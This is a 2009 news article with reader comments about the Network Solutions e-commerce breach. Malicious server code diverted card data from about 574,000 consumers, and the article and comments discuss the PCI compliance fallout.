Network Solutions Data Breach Hits 574,000 Consumers
Written by Evan SchumanAn E-Commerce software company that, as part of its service for small retailers accepted payment card data and then sent it to various processors, has found itself on the wrong end of a breached company news release, confirming that payment data from some 574,000 customers—processed through 4,343 of its small retail clients—had been accessed. The stolen data included transaction specifics, card account numbers, names and consumer addresses.
The details include an early PCI attempt to try and walk back the certification, retailers complaining about their names appearing in a breach notification letter and the vendor bringing in General Dynamics, a familiar name from the data breach probes of both TJX and Hannaford. Plus a former IT manager with the company claiming that they retain credit card data a lot longer than they say they do.
The vendor—Network Solutions—had been certified PCI compliant (you just knew that was coming, no?) Visa has been fine-tuning its revisionist-history dance, where it has declared that no PCI compliant organization has ever been breached, forcing the card brand to find a reason to unvalidate any entity that had been certified compliant. A statement from the PCI Council on Monday (July 27) laid the groundwork for taking back the PCI certification that assessor PSC granted them last Halloween. (A PCI certification that is good only until a breach happens? Now that’s a scary retail trick-or-treat.)
The statement under the name of Bob Russo, the general manager for the PCI Security Standards Council, said: “Until a forensics investigation is completed, an organization cannot comment accurately on its compliance status.” The statement then said that ongoing vigilance is essential in maintaining PCI compliance. Once again, the retailer dreams of a PCI Safe Harbor are just that.
Back to the Network Solutions breach. Network Solutions provides a full E-Commerce suite, designed for very small retailers. Although a small business is generally defined as fewer than 100 employees, Network Solutions PR Director Susan Wade said “Our average merchant tends to have fewer than ten employees.” It has the usual shopping cart and design elements, which is customized for thousands of small retailers. Each retailer has to arrange for its own processor, of course, but Network Solutions relays the credit card info from its site to the processor chosen by that merchant.
During an ordinary maintenance sweep in early June, Wade said, code was discovered on certain parts of various servers. Network Solutions CEO Roy Dunbar said in a letter: “We believe that some credit card transactions that took place on your website this past spring were intentionally diverted from certain of our servers to servers outside Network Solutions by an unknown source.”
Network Solutions brought in General Dynamics to help diagnose the problem. General Dynamics is getting to be an old hand at such matters, given that it had performed the same sort of post-breach evaluation for TJX and also worked with Hannaford on boosting its post-breach security.
“It took quite a while to crack the code,” Wade said, adding that they finally figured out “some of the code” on July 13 and saw that it had been grabbing payment data and sending it outside the network.
The E-Commerce vendor was able to identify very specific numbers of those impacted—4,343 retailers and 573,928 consumers—because “that’s the number of sites that were on the portions of the servers that were impacted,” Wade said, adding that the impacted transactions were made between March 12, 2009 and June 8, 2009.
-Marc
July 29th, 2009 at 3:31 pm
Compliant but not secure – it is a chant that security vendors have been singing for some time and getting accused of just trying to sell their wares. A breach of this enormity while “compliant” should send a real message to those who are still looking at the cost/benefit analysis and betting that they won’t get breached. One telling quote in your piece is “During an ordinary maintenance sweep in early June.” Do you leave your house and only lock the door once every three months. To protect your network and your data you need not only strong encryption but also 24×7 monitoring of both your wired and your wireless network(s).
July 30th, 2009 at 2:54 pm
The quote about a merchant being considered compliant until there is a breach (and then having that compliance revoked) is outrageous. First Hannaford, now Network Solutions, who is next. What is the point of gaining compliance?
To me the scary part of this is that since PCI-DSS cannot seem to “manage” the issue, states are taking matters in their own hands and in most cases taking horrible approaches (it is almost impossible for a small retailer to be compliant with the new Massachussets data privacy law). It’s only a matter of time before Congress tries to stave off the state laws with some expansion of FACTA or something new all together. I am not looking forward to that day.
August 4th, 2009 at 5:25 pm
Once again the industry is doing its best to put all the blame on the path of least resistance – the merchant.
August 4th, 2009 at 5:26 pm
The scariest part of it all is that no matter what they do the data is still there in some format. The goal is to somehow remove all the data. If thieves can’t find a good pond to fish in with lots of fish (all the credit card data); they have to go somewhere else.
August 6th, 2009 at 10:05 am
A more cautionary note would be… OK. Network Solutions got hacked over an 88 day period. Was this exclusive to them? Probably not. What about the small retailers hosting at GoDaddy, Web.com, HostGator, etc. These same malicious activities are going on elsewhere as we speak. I hope someone is checking them out. So what’s the solution? Change the old approach. Merchants need to eliminate capturing, storing and tranmitting payment data. Period. Investigate alternative solutions or services like hosted payment page technologies from a level 1 service provider. If you can’t lock down the sensitive data, get rid of it. There are other ways to securely serve your customers.
August 28th, 2009 at 11:13 am
The consumers are the ones getting screwed. Our credit card numbers have been stolen and the merchants bitch and moan about their names being associated with the theft?!? I want to know which merchants were affected so I can figure out which of my cards was affected and cancel it. Forget about free credit monitoring, which is just a scam to sign me up for a “free trial period” and then slam me for monthly charges, and requires that I provide personal information (including SSN) in electronic, duplicable form to yet another faceless, anonymouse corporate behemoth who doesn’t give a rat’s a$$ about security. But god forbid I be given any useful information at all about my own f-ing financial transactions.